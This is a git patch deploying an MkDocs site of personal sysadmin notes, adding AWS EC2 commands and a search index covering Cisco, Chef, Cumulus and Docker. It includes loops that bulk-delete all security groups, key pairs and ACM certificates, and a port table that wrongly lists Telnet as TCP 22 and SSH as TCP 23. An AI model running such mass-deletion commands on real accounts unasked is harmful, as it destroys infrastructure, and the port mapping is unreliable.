From 1715e9b2ef3b7887a0ffccb72bad06f05668aa6c Mon Sep 17 00:00:00 2001
From: Laurent Dumont
Date: Mon, 9 Dec 2024 12:08:27 -0500
Subject: [PATCH] Deployed 735d670 with MkDocs version: 1.6.0
---
aws-cli/index.html | 75 +++++++++++++++++++++++++++++++++++++++
search/search_index.json | 2 +-
sitemap.xml.gz | Bin 127 -> 127 bytes
3 files changed, 76 insertions(+), 1 deletion(-)
diff --git a/aws-cli/index.html b/aws-cli/index.html
index 648bcfd..3a53ab8 100644
--- a/aws-cli/index.html
+++ b/aws-cli/index.html
@@ -363,6 +363,39 @@ + + +
  • + + + EC2 + + + + +
  • @@ -1250,6 +1283,39 @@ + + +
  • + + + EC2 + + + + +
  • @@ -1315,6 +1381,15 @@

    API Gateway

    aws apigatewayv2 delete-api --api-id 80wxwwwn2l
     
    +

    EC2

    +

    Delete Security Groups

    +
    aws ec2 describe-security-groups --query "SecurityGroups[*].GroupName" --no-cli-pager --output json | jq -r '.[]' | while IFS= read -r sg; do aws ec2 delete-security-group --group-name $sg; done 
    +
    + +

    Delete key pairs

    +
    aws ec2 describe-key-pairs --query "KeyPairs[*].KeyName" --no-cli-pager | jq -r '.[]' | while IFS= read -r key; do aws ec2 delete-key-pair --key-name $key --no-cli-pager; done
    +
    +
diff --git a/search/search_index.json b/search/search_index.json
index 3486fec..1535aac 100644
--- a/search/search_index.json
+++ b/search/search_index.json
@@ -1 +1 @@ -{"config":{"lang":["en"],"separator":"[\\s\\-]+","pipeline":["stopWordFilter"]},"docs":[{"location":"","title":"Home","text":""},{"location":"aws-cli/","title":"AWS","text":""},{"location":"aws-cli/#acm","title":"ACM","text":"

    Useful things - Use no-cli-pager to send the result directly to the terminal and not to less - There is a bug for the help menu --> https://github.com/aws/aws-cli/issues/4972 - You can send it to cat as a workaround --> aws ec2 help | cat - There is an autocomplete built into the CLI - You can use --cli-auto-prompt with each prompt

    "},{"location":"aws-cli/#list-certificates","title":"List certificates","text":"
    aws acm list-certificates --output json --no-cli-pager --query 'CertificateSummaryList[*].CertificateArn'\n
    "},{"location":"aws-cli/#acm-delete-certificates","title":"ACM Delete certificates","text":"
    for arn in $(aws acm list-certificates --output json --no-cli-pager --query 'CertificateSummaryList[*].CertificateArn' | jq -r '.[]'); do aws acm delete-certificate --certificate-arn \"$arn\"; done\n
    "},{"location":"aws-cli/#codecommit","title":"CodeCommit","text":"

    Note, this service is deprecated by AWS. You should stop current usage and migrate to SCM alternatives (Gitlab, Github and others)

    "},{"location":"aws-cli/#list-repositories","title":"List repositories","text":"
    aws codecommit list-repositories --no-cli-pager\n
    "},{"location":"aws-cli/#delete-repositories","title":"Delete repositories","text":"
    aws codecommit delete-repository --repository-name gremlins-api\n
    "},{"location":"aws-cli/#api-gateway","title":"API Gateway","text":"

    Note the apigatewayv2 in some cases

    Get a custom domain name

    aws apigateway get-domain-names --no-cli-pager --query 'items[*]['regionalCertificateArn','domainName']' | jq -r '.[]'\n

    Delete a custom domain name

    aws apigateway delete-domain-name --domain-name sig.coldnorthadmin.com\n

    Get an API

    aws apigatewayv2 get-apis --query 'Items[*]['ApiId']' --no-cli-pager\n

    Delete an API

    aws apigatewayv2 delete-api --api-id 80wxwwwn2l\n
    "},{"location":"bluetooth/","title":"Bluetooth","text":"

    Ubuntu reference https://wiki.ubuntu.com/DebuggingBluetooth#:~:text=On%20desktop%3A,%2Fvar%2Flog%2Fsyslog

    "},{"location":"bluetooth/#basic-bluetooth-troubleshooting-commands","title":"Basic bluetooth troubleshooting commands","text":"
    bluetoothctl --version\n
    hciconfig -a\n
    bluetoothctl\n[bluetooth]# show\n[bluetooth]# devices\n[bluetooth]# info <mac addr of any device you have problems with>\n
    rfkill list\nNecessary bluetooth log files in debug mode as per below\n
    "},{"location":"ccna/","title":"Cisco-CCNA","text":""},{"location":"ccna/#ethernet-and-frames","title":"Ethernet and Frames","text":""},{"location":"ccna/#ethernet-type-field","title":"Ethernet \"Type\" field","text":"

    Hub = port needs to be at half-duplex

    "},{"location":"ccna/#cisco-security","title":"Cisco Security","text":""},{"location":"ccna/#user-and-access-management","title":"User and access management","text":"

    Enable secret takes precedence over enable password.

    enable password potato\nenable secret potato2\n\nenable password = potato2\n

    Enable AAA (allow user with privilege 15 to login straight into enable mode)

    conf t\naaa new-model\naaa authentication login default group local\naaa authorization exec default group local\n

    Create user with default privilege 15 level

    conf t\nusername $USERNAME privilege 15 secret $PASSWORD\n

    login = password and username of the vty itself. login local = Local username database

    conf t\nline con 0\nlogin local\nexec-timeout 0 0\nlogging synchronous\n

    Line VTY user are set to privilege 15 automatically.

    conf t\nline vty 0 15\nprivilege level 15\n

    \"Encrypt\" passwords in the startup-config.

    service password-encryption\n
    "},{"location":"ccna/#port-security","title":"Port-Security","text":"

    Enabling port security on port Cannot be enabled on a trunk/dynamic/auto port. Must be an access port.

    conf t\ninterface gigabitethernet0/1\nswitchport port-security\n

    Keep MAC addresses when port-shutdown or switch reload.

    conf t\ninterface gigabitethernet0/1\nswitchport port-security\nswitchport port-security mac-address sticky\n
    "},{"location":"ccna/#mac-aging","title":"MAC aging","text":"

    Dynamic MAC aging default = 0 absolute timer = Counts down irregardless of traffic inactivity timer = resets when traffic is seen from MAC. maximum - Default 1 If you raise the number of max MAC addresses on a port, you can run static and dynamic MAC detection.

    "},{"location":"ccna/#mac-address-conversion","title":"MAC address conversion","text":"Character HEX a 10 b 11 c 12 d 13 e 14 f 15

    Hexadecimal A7 to decimal A = 10 units of 16 (A=16) ---> 160 7 = 7 units of 1 ---> 7 160 + 7 = 167

    Decimal 241 to Hexadecimal 1. f = 15 * 16 2. 1 = 1 * 1 3. F1

    "},{"location":"ccna/#violation-option","title":"Violation option","text":"

    protect - Drops traffic, no SYSLOG, no SNMP Trap, no counters increased restrict - Drops traffic, generate SNMP trap, generate SYSLOG. shutdown - Default, increase violation counters, Port shutdown in error-disabled.

    Show port-security commands

    show port-security interface fastethernet 0/1\n
    show port-security address\n

    Error disabled recovery Default recovery 300 seconds

    conf t\nerrordisable recovery cause ?\nerrordisable recovery cause psecure-violation\nerrdisable recovery interval 30\n
    show errdisable recovery\n
    "},{"location":"ccna/#vlan-interfaces-svi","title":"VLAN interfaces (SVI)","text":""},{"location":"ccna/#autonegociation-speed-and-duplex","title":"Autonegociation - Speed and Duplex","text":""},{"location":"ccna/#interface-range","title":"Interface range","text":"
    interface range fastethernet 0/1-24\ninterface range fastethernet 0/1-24,25,26\n
    "},{"location":"ccna/#tcp-and-udp","title":"TCP and UDP","text":""},{"location":"ccna/#tcp","title":"TCP","text":""},{"location":"ccna/#udp","title":"UDP","text":""},{"location":"ccna/#port-numbers","title":"Port Numbers","text":"

    Well-known port numbers:

    Protocol / Transport Port HTTPS / TCP 443 SNMP / UDP 161 SMTP / TCP 25 TELNET / TCP 22 SSH / TCP 23

    Socket ---> Combination of an ipaddress and a port number. 192.168.1.1:10000

    "},{"location":"ccna/#dhcp","title":"DHCP","text":"

    DORA 1. Discover - Broadcast from client. 2. Offer - DHCP server receives Discover and sends unicast offer to client. 3. Request - Client sends request for the offered IP address. 4. Ack - DHCP server ack the client request and assigns the IP.

    "},{"location":"ccna/#routing-static-routes","title":"Routing - Static Routes","text":"
    ip route destination_subnet destination_mask [local-router-exit-interface | next-hop-ip-address]\n\nip route 2.2.2.2 255.255.255.0 192.168.1.1\n\n#Default Route\nip route 0.0.0.0 0.0.0.0 [local-router-exit-interface | next-hop-ip-address]\n
    "},{"location":"ccna/#routing-distance-vector-protocols-rip","title":"Routing - Distance Vector Protocols - RIP","text":"

    RIPv1 / IGRP

    RIPv2

    Split Horizon

    Route Poisoning

    Hops

    "},{"location":"ccna/#enabling-ripv2","title":"Enabling RIPv2","text":"
    conf t\nrouter rip\n\n#Show protocols active on router\nshow ip protocols\n\n#Enable specific version of RIPv2 per interface or global.\ninterface gig0/1\nip rip send version 2\n\nconf t\nrouter rip\nrip version 2\nnetwork 10.10.10.0\nnetwork 10.10.11.0\n\n#Disable auto summary\nconf t\nrouter rip\nno auto-summary\n\n#Enable split Horizon\ninterface serial0/1/0\nip split-horizon\n

    Confirming that RIPV2 works.

    show ip protocols\nshow ip rip database\n

    Clear RIP routes.

    clear ip route *\n
    "},{"location":"ccna/#passive-interfaces","title":"Passive interfaces","text":"

    Prevents sending RIPv2 updates from interfaces where it's not necessary.

    conf t\nrouter rip\npassive-interface fastethernet0/1\npassive-interface fastethernet0/2\n
    conf t\nrouter rip\npassive-interface default\nno passive-interface fastethernet0/1\nno passive-interface fastethernet0/2\n
    "},{"location":"ccna/#rip-load-balancing","title":"RIP Load Balancing","text":"

    1) If a subnet is reachable through two paths with the same hope count --> Load balance across the two links.

    Disabling equal cost load balancing

    conf t\nrouter rip\nmaximum-path 1\n
    "},{"location":"ccna/#default-route-in-rip","title":"Default route in RIP","text":"
    conf t\nrouter rip\ndefault-information originate\n
    "},{"location":"ccna/#routing-administrative-distance","title":"Routing Administrative distance","text":"

    1) The prefix mask is considered first. The more specific route is installed. 2) If the prefix max is \"=\" ---> Administrative Distance is checked. The route with the lowest ADs wins.

    "},{"location":"ccna/#floating-static-routes","title":"Floating static routes","text":"

    If a route with a lower AD is removed from the routing table, the static route will be added and become active.

    conf t\nip route 2.2.2.0 255.255.255.0 21.1.1.2 [static route metric here | higher than routing protocol 1-255 ]\n
    "},{"location":"ccna/#subnetting","title":"Subnetting","text":"128 64 32 16 8 4 2 1 45 0 0 0 0 1 1 0 1

    200.17.100.3

    128 64 32 16 8 4 2 1 200 1 1 0 0 1 0 0 0 17 0 0 0 1 0 0 0 1 100 0 1 1 0 0 1 0 0 3 0 0 0 0 0 0 1 1

    11001000.00010001.01100100.00000011

    "},{"location":"ccna/#network-class","title":"Network class","text":"Class A Class B Class C 1st Octet range 1 - 126 128 - 191 192 - 223 Network Mask 255.0.0.0 - /8 255.255.0.0 - /16 255.255.255.0 - /24"},{"location":"ccna/#number-of-subnet-in-a-network-200110-27","title":"Number of subnet in a network - 200.1.1.0 /27","text":"
    1. Find the class of the subnet --> Class C (+192)
    2. A class C is a /24 by default.
    3. /27 - /24 = 3 subnet bits.
    4. Number of subnet --> 2^Number_subnet_bits_remaining --> 2^3 --> 2 * 2 * 2 = 8 subnets
    "},{"location":"ccna/#number-of-hosts-per-subnet-200110-27","title":"Number of hosts per subnet - 200.1.1.0 /27","text":"
    1. Find the number of host bits --> /32 - /27 --> /5 host bits
    2. Find the number of valid host per subnet - remove subnet and broadcast address.
    3. (2^(number of host bits))-2 --> 2^5 --> 2 * 2 * 2 * 2 * 2 --> 32 - 2 --> 30
    "},{"location":"ccna/#find-the-subnet-of-an-ip-address-101721418","title":"Find the Subnet of an IP address - 10.17.2.14/18","text":"
    1. /18 = First two octets = 16 bits + 2 bits from third octet
    2. 10.17.00000010
    3. 10.17.00 000000 --> Total of 18 bits for subnet address
    4. Subnet address = 10.17.0.0/18
    "},{"location":"ccna/#find-the-broadcast-and-range-of-valid-addresses-in-subnet-210461100-25","title":"Find the broadcast and range of valid addresses in subnet - 210.46.110.0 /25","text":"
    1. /32 - /25 = last 7 bits --> host bits
    2. 01111111 --> 64 + 32 +16 +8 + 4 + 2 +1 --> 96 + 16 + 15 --> 96 + 31 --> Broadcast = 210.46.110.127
    "},{"location":"ccna/#find-the-broadcast-and-range-of-valid-addresses-in-subnet-15010640-18","title":"Find the broadcast and range of valid addresses in subnet - 150.10.64.0 /18","text":"
    1. /32 - /18 = last 14 bits --> host bits
    128 64 32 16 8 4 2 1 64 0 1 0 0 0 0 0 0
    1. Broadcast --> 150.10.01111111.11111111 --> 150.10.127.255
    2. Range of valid addresses --> 150.10.64.1 to 150.10.127.254
    "},{"location":"ccna/#access-lists","title":"Access Lists","text":""},{"location":"ccna/#wildcard-masks","title":"Wildcard masks","text":""},{"location":"ccna/#standard-acl","title":"Standard ACL","text":"
    <1-99>       Standard IP access-list number\n<1300-1999>  Standard IP access-list number (expanded range)\nWORD         Access-list name\n
    ip access-list standard 5 deny 3.3.3.0 0.0.0.255\ninterface fastethernet0\nip access-group 5 in\n
    "},{"location":"ccna/#extended-acl","title":"Extended ACL","text":""},{"location":"ccna/#named-extendedstandard-acl","title":"Named Extended/Standard ACL","text":"
    conf t\nip access-list extended BLOCK11\ndeny ip 3.3.3.0 0.0.0.255 11.11.11.0 0.0.0.255\npermet ip any any\n
    "},{"location":"ccna/#acl-on-vty-lines","title":"ACL on VTY lines","text":"
    conf t\nline vty 0 14\naccess-class MGMT-NETWORKS in\n
    "},{"location":"ccna/#acl-sequence-numbers","title":"ACL Sequence numbers","text":"
    conf t\nip access-list extended 101\nno $SEQUENCE_NUMVER\n
    "},{"location":"ccna/#where-to-apply-acls","title":"Where to apply ACLs","text":""},{"location":"ccna/#ntp-network-time-protocol","title":"NTP - Network Time Protocol","text":""},{"location":"ccna/#stratum-level-of-accuracy-of-the-ntp-server","title":"Stratum - Level of accuracy of the NTP server.","text":""},{"location":"ccna/#ntp-modes","title":"NTP Modes","text":"
    !*** Set the device itself as the master NTP server.\nconf t\nntp master\n
    !*** Set the NTP server for the device.\nconf t\nntp server ntp.nist.ca\n
    conf t\nntp peer ntp.potato.com\n
    !*** Show all ntp services from which the device will sync it's clock. Also shows the preferred device.\nshow ntp associations\n\nshow ntp status\n\nshow clock\n
    !*** Under device interface configuration.\n!*** Sets broadcast server mode (send updates)\nconf t\ninterface serial 0/1/0\nntp broadcast\n\n\n!*** Set client broadcast mode\nconf t\ninterface serial 0/1/0\nntp broadcast client\n
    "},{"location":"ccna/#nat-pat-network-address-translation-port-address-translation","title":"NAT / PAT - Network Address Translation / Port Address Translation","text":""},{"location":"ccna/#static-nat","title":"Static NAT","text":"
    !*** Place on the interfaces closest to the hosts.\nip nat inside\n\n!*** Place on the WAN interface.\nip nat outside\n\n!*** Setup Static NAT / One to one mapping\nip nat inside source static 10.1.1.2 200.1.1.1\n\n\n!*** Show translations\nshow ip nat translations\n\n!*** Show NAT statistics\nshow ip nat statistics\n\n!*** clear ip nat table to reset the NAT mappings\nclear ip nat translations *\n
    "},{"location":"ccna/#dynamic-nat","title":"Dynamic NAT","text":"

    Allow the NAT of a pool of internal address to a pool of outside addresses.

    !*** Create IP NAT Pool\nip nat pool CCNA 200.1.1.1 200.1.1.5 prefix-length 24\n\n!*** Create the access-list of internal host that will be NAT.\naccess-list 2 permit host 10.1.1.2\naccess-list 2 permit host 10.1.1.22\n\n!*** Create the NAT function for the access-list 2 and the pool CCNA  \nip nat inside source list 2 pool CCNA\n
    "},{"location":"ccna/#port-address-translation-nat-overload","title":"Port address translation - NAT Overload","text":"

    Allows the mapping of multiple inside addresses to a single outside address using a combination of the IP address / Port Number in ordre to uniquely identify each flow of data.

    !*** Overload of the inside addresses to the outside address\nip nat inside source list 2 interface serial0/1/0 overload\n
    "},{"location":"ccna/#ipv6","title":"IPv6","text":""},{"location":"ccna/#compressing-ipv6-addresses","title":"Compressing IPv6 addresses","text":""},{"location":"ccna/#assigning-ipv6-addresses-to-interfaces","title":"Assigning IPv6 addresses to interfaces","text":"
    !### Enable IPv6 Routing for the router.\nipv6 unicast-routing\n\n!### Assign an IPv6 address to an interface\ninterface fastethernet0/1\nipv6 address 2001:1111:2222:1::1/64\n
    "},{"location":"ccna/#types-of-ipv6-addresses","title":"Types of IPv6 addresses.","text":""},{"location":"ccna/#eui-64-process","title":"EUI-64 Process","text":"
    1. Take MAC address of the interface
    2. 11-22-33-aa-bb-cc
    3. Divide in half and insert FFFE.
    4. 11-22-33-FF-FE-AA-BB-CC
    5. 1122:33FF:FEAA:BBCC
    6. Do the bit inversion (invert the 7th bit of the address)
    7. 1122:33FF:FEAA:BBCC --> 1322:33FF:FEAA:BBCC
    "},{"location":"ccna/#use-eui-64-process-for-global-unicast-address","title":"Use EUI-64 process for global unicast address.","text":"
    ipv6 address 2001:1111:2222:1::/64 eui-64\n
    "},{"location":"ccna/#ipv6-ndp-neighbor-discovery-process","title":"IPv6 NDP - Neighbor Discovery Process","text":""},{"location":"ccna/#ndp-router-discovery","title":"NDP - Router Discovery","text":"
    1. Hosts multicast packet - Router Solicitation (RS) message - Destination address FF02::2 - All-IPv6-Routers address
    2. Routers receives RS on FF02::2 and sends RA (Router Advertisement).
    3. If the soliciting node HAS an IPv6 address --> RA is unicast to the host.
    4. If the soliciting node DOES NOT have an IPv6 address --> RA is sent to FF02::1 - \"All-IPV6-Nodes\"
    5. RA are also sent to FF02::1 every 200 seconds.
    6. FF02::1 --> All IPv6 hosts.
    "},{"location":"ccna/#ndp-host-discovery","title":"NDP - Host Discovery","text":""},{"location":"ccna/#dhcp-and-ipv6","title":"DHCP and IPv6","text":""},{"location":"ccna/#stateful-dhcp","title":"Stateful DHCP","text":"

    Stateful DHCP does not send \"Default Gateway\" in the DHCP lease. That part is discovered during the NDP process with NA and NS messages.

    "},{"location":"ccna/#stateless-dhcp","title":"Stateless DHCP","text":""},{"location":"ccna/#ipv6-duplicate-address-detection-dad","title":"IPv6 - Duplicate Address Detection - DAD","text":"

    Prevents duplicate addresses from being used on the network. 1. The host will send an NS (with the source address all :: - 128 zeros - unspecified ipv6 address) to the address it wants to use to FF02::1 (All IPV6 nodes) 2. If it gets a response, it means that a host is already using that address.

    "},{"location":"ccna/#ipv6-packet-header","title":"IPv6 Packet Header","text":""},{"location":"ccna/#logging-and-timestamps","title":"Logging and Timestamps","text":"

    Change the aspect and format of timestamps for SYSLOG and DEBUG message.

    service timestamps log datetime\n\n!### Add year to log timestamps.\nservice timestamps log datetime year\n\n!### Add millisecond to log timestamps.\nservice timestamps log datetime msec\n\nservice timestamps log datetime year msec show-timezone\n
    "},{"location":"ccna/#logging-to-remote-server","title":"Logging to remote server","text":"

    Enable logging to the console.

    logging console\n

    Enable buffered logging. Local buffer on the server.

    logging buffer\n

    Enable logging to a remote server.

    logging host $SYSLOG_SERVER_IPADDRESS\n

    Enable console logging on SSH/Telnet session

    conf t\nlogging monitor\nexit\nterminal monitor\n
    "},{"location":"ccna/#banner-configuration","title":"Banner configuration","text":"

    Three types of banners.

    "},{"location":"ccna/#cdp-cisco-discovery-protocol","title":"CDP - Cisco Discovery Protocol","text":"
    show cdp neighbors\nshow cdp neighbors details\nshow cdp entry $REMOTE_DEVICE_HOSTNAME\n\n!*** Enable CDP globally.\ncdp run\nno cdp run\n\n!*** Enable CDP on an interface\ninterface fastethernet0/0\ncdp enable\nno cdp enable\n\n!*** Show CDP information\nshow cdp information\nshow cdp interface fastethernet 0/0\n
    "},{"location":"ccna/#lldp-link-layer-discovery-protocols","title":"LLDP - Link Layer Discovery Protocols","text":"

    You can disable the received and transmit of LLDP packets per interface. That is not possible for CDP.

    show lldp\n\nconf t\nlldp run\n\nshow lldp neighbor detail\n

    "},{"location":"ccna/#confreg-register-and-password-recovery","title":"Confreg Register and Password Recovery","text":"
    show version | include register\nconfig-register 0x2142\n
    "},{"location":"chef/","title":"Chef","text":""},{"location":"chef/#chef-server-setup","title":"Chef server setup","text":"
    sudo dpkg -i /tmp/chef-server-core-<version>.deb\nchef-server-ctl reconfigure\nchef-server-ctl user-create USER_NAME FIRST_NAME LAST_NAME EMAIL 'PASSWORD' --filename FILE_NAME\nchef-server-ctl org-create northernsysadmin 'Northern Sysadmin Inc' --association_user sysadmin --filename /var/chef_ssh/northernsysadmin-validator.pem\n
    knife ssl check\nknife ssl fetch\n\nknife cookbook upload $COOKBOOK_NAME_HERE\nknife client list\nknife cookbook list\n
    knife bootstrap 10.255.255.8 --ssh-user sysadmin --ssh-password 'PASSWORD_HERE' --sudo --use-sudo-password --node-name puppet-minion1 --run-list 'recipe[learn_chef_apache2]'\n
    knife node list\nknife node show $NODE_NAME\n
    "},{"location":"chef/#create-roles-and-assign-cookbooks-to-them","title":"Create roles and assign cookbooks to them.","text":"

    roles/ntp.json

    {\n   \"name\": \"ntp\",\n   \"description\": \"NTP server role.\",\n   \"json_class\": \"Chef::Role\",\n   \"default_attributes\": {\n     \"chef_client\": {\n       \"interval\": 60,\n       \"splay\": 1\n     }\n   },\n   \"override_attributes\": {\n   },\n   \"chef_type\": \"role\",\n   \"run_list\": [\"recipe[chef-client::default]\",\n                \"recipe[chef-client::delete_validation]\",\n                \"recipe[ntpd::default]\"\n   ],\n   \"env_run_lists\": {\n   }\n}\n
    1. Upload the role to the Chef Server : knife role from file roles/web.json
    2. Check that the role is on the server : knife role list - knife role show ntp
    3. Find node name from knife node list - knife node run_list set puppet-minion1 \"role[ntp]\"
    4. Confirm that the role is applied to the Node : knife node show puppet-minion1 --run-list
    5. Run chef-client on the node.
    6. knife ssh 10.255.255.8 'role:web' 'sudo chef-client' --ssh-user sysadmin --ssh-password 'PASSWORD_HERE' --sudo --use-sudo-password --node-name puppet-minion1
    "},{"location":"chef/#dependencies-in-cookbooks","title":"Dependencies in cookbooks.","text":"

    metadata.rb - keyword \"depends\" - Used to list the other coobooks from which the cookbook depends to run properly.

    name 'prometheus_node'\nmaintainer 'Laurent Dumont'\nmaintainer_email 'ldumont@northernsysadmin.com'\nlicense 'All Rights Reserved'\ndescription 'Installs/Configures prometheus-node'\nlong_description 'Installs/Configures prometheus-node'\nversion '0.1.1'\ndepends 'tar'\nchef_version '>= 12.14' if respond_to?(:chef_version)\n
    "},{"location":"cisco/","title":"Cisco","text":""},{"location":"cisco/#general-troubleshooting","title":"General Troubleshooting","text":"

    IOS-XR

    show route vrf all 10.4.229.135/32\nshow route vrf all | inc 10.4.229. \nshow evpn evi vpn-id 11034\n
    #IPV4\nshow arp vrf $VRF_NAME  Te0/0/0/6.200\n\n#IPV6\nshow ipv6 neighbors vrf $VRF_NAME Te0/0/0/6.198\n
    show bgp vrf BMCE ipv6 unicast summary\nshow bgp vrf BMCE ipv4 unicast summary\n
    show bfd ipv6 session\nshow bfd ipv4 session\n
    show running-config  | utility egrep -C5 bfd\nshow isis neighbors\nshow bgp ipv4 all summary\n
    "},{"location":"cisco/#show-detailed-information-about-interface","title":"Show detailed information about interface","text":"
    show controllers TenGigE0/0/0/18\n
    "},{"location":"cisco/#show-control-plane-policing","title":"Show control plane policing","text":"
    show running-config control-plane\n

    !Check Policy-Map drops/number of packet matching the policy.

    show policy-map interface $PHYSICAL_INTERFACE service instance $SVC_INST_ID\n

    !Show l2vpn xconnect status (ASR 9k)

    show l2vpn service xconnect interface gigabitEthernet 0/1\n

    !Show l2vpn xconnect status with details (ASR 9k)

    show l2vpn xconnect neighbor 192.252.143.75 pw-id 702 detail\n

    !Show service-instance traffic details (not xconnect, just local service instance)

    show ethernet service instance id 205 int ten0/3/0 detail\n
    show mpls l2transport vc vcid 395 detail\n

    !ASR 9000 | IOS-XE

    show l2vpn service xconnect interface TenGigabitEthernet0/3/0\n
    show l2vpn xconnect group OPEN01 xc-name OPEN01-C220\n
    show l2vpn xconnect group PARA07 detail\n

    !BGP stuff | IOS-XE

    show bgp summary | inc NEIGHBOR_IP\n

    !BGP stuff | IOS-XR

    show ip bgp summary\nshow ip bgp neighbors\nshow ip bgp neighbors 1.1.1.1\n

    !Montrer les routes recu d'un neighbor en particulier

    conf t\nrouter bgp AS_NUMBER\n

    !Il faut activer le log des routes pour chacun des neighbors BGP concern\u00e9s

    neighbor 1.1.1.1 soft-reconfiguration inbound\nexit\nsh ip bgp neighbors 1.1.1.1 received-routes\nsh ip bgp neighbors 1.1.1.1 advertised-routes\n
    conf t\nrouter bgp AS_NUMBER\nneighbor 1.1.1.1 shutdown\n

    !Satellite 9k light levels

    show nV satellite status\ntelnet vrf **nVSatellite 10.0.100.1\n\n!GigabitEthernet112/0/0/17 ---> Satellite 112\ntelnet vrf **nVSatellite 10.0.112.1\n!Port 17 on ASR = Port 18 on Satellite\nsh satellite powerlevels port 18\n

    https://www.cisco.com/c/en/us/td/docs/routers/access/4400/troubleshooting/memorytroubleshooting/isr4000_mem.html https://www.cisco.com/c/en/us/support/docs/routers/4000-series-integrated-services-routers/210760-Monitor-CPU-Usage-On-ISR4300-Series.html

    show process cpu sorted | ex 0.0\n
    show platform hardware qfp active datapath utilization\n
    show platform software status control-processor\n
    show platform software status control-processor brief\n
    show processes cpu platform sorted\n
    show platform software status control-processor brief\n

    Show CPU and Memory like \"htop\" for Linux

    monitor platform software process rp active\n
    "},{"location":"cisco/#troubleshooting-cisco-isr-memory","title":"Troubleshooting Cisco ISR Memory.","text":"

    Show IOS processes memory usage.

    show processes memory\n

    Show platform CPU and Memory usage

    show platform resources\n

    Show IOS-XE Memory usage (not IOS)

    show platform software status control-processor brief\n
    "},{"location":"cisco/#cisco-barebones-iosxr-bgp-config","title":"Cisco barebones IOSXR BGP config","text":"
    router bgp 64501 vrf super-potato-laurent neighbor 199.199.199.253\nrouter bgp 64501 vrf super-potato-laurent neighbor 199.199.199.253 remote-as 65505\nrouter bgp 64501 vrf super-potato-laurent neighbor 199.199.199.253 bfd fast-detect\nrouter bgp 64501 vrf super-potato-laurent neighbor 199.199.199.253 bfd multiplier 3\nrouter bgp 64501 vrf super-potato-laurent neighbor 199.199.199.253 bfd minimum-interval 100\nrouter bgp 64501 vrf super-potato-laurent neighbor 199.199.199.253 address-family ipv4 unicast\nrouter bgp 64501 vrf super-potato-laurent neighbor 199.199.199.253 address-family ipv4 unicast route-policy pass-all in\nrouter bgp 64501 vrf super-potato-laurent neighbor 199.199.199.253 address-family ipv4 unicast route-policy pass-all out\nrouter bgp 64501 vrf super-potato-laurent neighbor 199.199.199.253 address-family ipv4 unicast as-override\nrouter bgp 64501 vrf super-potato-laurent neighbor 199.199.199.253 address-family ipv4 unicast soft-reconfiguration inbound always\n
    "},{"location":"cisco/#cisco-radius","title":"Cisco Radius","text":"
    conf t\naaa new-model\n\naaa group server radius DHMTL-RADIUS\n server-private 10.0.99.22 auth-port 1812 acct-port 1813 key $INSERT_KEY_HERE\n\naaa group server tacacs+ DHMTL-TACACS\n server-private 10.0.99.22 key $INSERT_KEY_HERE\n\naaa authentication login default group DHMTL-RADIUS local\naaa authorization exec default group DHMTL-RADIUS local\naaa accounting commands 15 default start-stop group DHMTL-TACACS\naaa accounting commands 3 default start-stop group DHMTL-TACACS\n
    "},{"location":"cisco/#activate-telnet-on-ios-xr","title":"Activate Telnet on IOS-XR","text":"
    telnet vrf management ipv4 server max-servers 10\ntelnet vrf $VRF_NAME ipv6 server max-servers $MAX_CONCURRENT_TELNET_CONNECTIONS\n
    "},{"location":"cumulus/","title":"Cumulus","text":""},{"location":"cumulus/#random-commands","title":"Random commands","text":"
    net add interface swp1 ip address 170.39.196.82/32\nnet add bgp autonomous-system 65000\nnet add bgp neighbor 170.39.196.81 remote-as 65000\nnet add bgp neighbor 170.39.196.81 password PASSWORD\nnet add bgp ipv4 unicast neighbor 170.39.196.81 next-hop-self\nnet add bgp redistribute connected\n\n\nnet add bgp neighbor 170.39.196.85 remote-as 65000\nnet add bgp neighbor 170.39.196.85 password PASSWORD\nnet add bgp ipv4 unicast neighbor 170.39.196.81 next-hop-self\nnet add bgp redistribute connected\n\nnet add bgp neighbor 170.39.196.84 remote-as 65000\nnet add bgp neighbor 170.39.196.84 password PASSWORD\nnet add bgp ipv4 unicast neighbor 170.39.196.81 next-hop-self\nnet add bgp redistribute connected\n\n\nnet add bgp neighbor 170.39.196.89 remote-as 65000\nnet add bgp neighbor 170.39.196.89 password PASSWORD\nnet add bgp ipv4 unicast neighbor 170.39.196.89 next-hop-self\nnet add bgp redistribute connected\n\n\nnet add bgp ipv4 unicast neighbor 170.39.196.84 next-hop-self\nnet add bgp ipv4 unicast neighbor 170.39.196.87 next-hop-self\n\n\nnet add ospf network 170.39.196.80/28 area 0\nnet add ospf default-information originate\nnet add ospf redistribute connected\nnet commit\n
    "},{"location":"docker/","title":"Docker","text":""},{"location":"docker/#stop-all-docker-containers-matching-pattern","title":"Stop all Docker containers matching pattern","text":"
    sudo docker ps | awk '/swift_/ {print $NF}' | xargs -I {} sudo docker stop {}\n
    "},{"location":"docker/#enter-namespace-of-the-container","title":"Enter Namespace of the container","text":"
    sudo docker inspect -f '{{.State.Pid}}' 744d1fc3fdff\n57752\n\n# Enter the Network namespace.\nsudo nsenter -t 57752 --net bash     \n
    "},{"location":"docker/#docker-install-bash-script","title":"Docker install bash script.","text":"
    #Install docker\n#!/bin/bash\n\nsudo apt-get install \\\n     apt-transport-https \\\n     ca-certificates \\\n     curl \\\n     gnupg2 \\\n     software-properties-common\n\ncurl -fsSL https://download.docker.com/linux/debian/gpg | sudo apt-key add -\n\nsudo add-apt-repository \\\n   \"deb [arch=amd64] https://download.docker.com/linux/debian \\\n   $(lsb_release -cs) \\\n   stable\"\n\nsudo apt-get update && apt-get install docker-ce\n
    "},{"location":"docker/#idrac-docker-vnc-image","title":"IDRAC Docker VNC image","text":"

    https://github.com/DomiStyle/docker-idrac6

    docker run -d -p 5800:5800 -p 5900:5900 -e IDRAC_HOST=IP_HERE -e IDRAC_USER=root -e IDRAC_PASSWORD=calvin domistyle/idrac6\n
    "},{"location":"docker/#radarr-docker","title":"Radarr Docker","text":"
    docker volume create radarr-config\n\nsudo docker run \\\n  -d \\\n  --name=radarr \\\n  -e PUID=109 \\\n  -e PGID=113 \\\n  -e TZ=America/Toronto \\\n  -p 7878:7878 \\\n  -v radarr-config:/config \\\n  -v /storage/media-gluster/movies/:/movies \\\n  -v /storage/media-gluster/downloads:/downloads \\\n  --restart unless-stopped \\\n  linuxserver/radarr\n
    "},{"location":"docker/#grafana-docker","title":"Grafana Docker","text":"
    sudo docker volume create grafana-storage\ndocker run \\\n  -d \\\n  -p 3000:3000 \\\n  --name=grafana \\\n  -v grafana-storage:/var/lib/grafana \\\n  grafana/grafana\n
    "},{"location":"docker/#couchpotato-docker","title":"Couchpotato Docker.","text":"
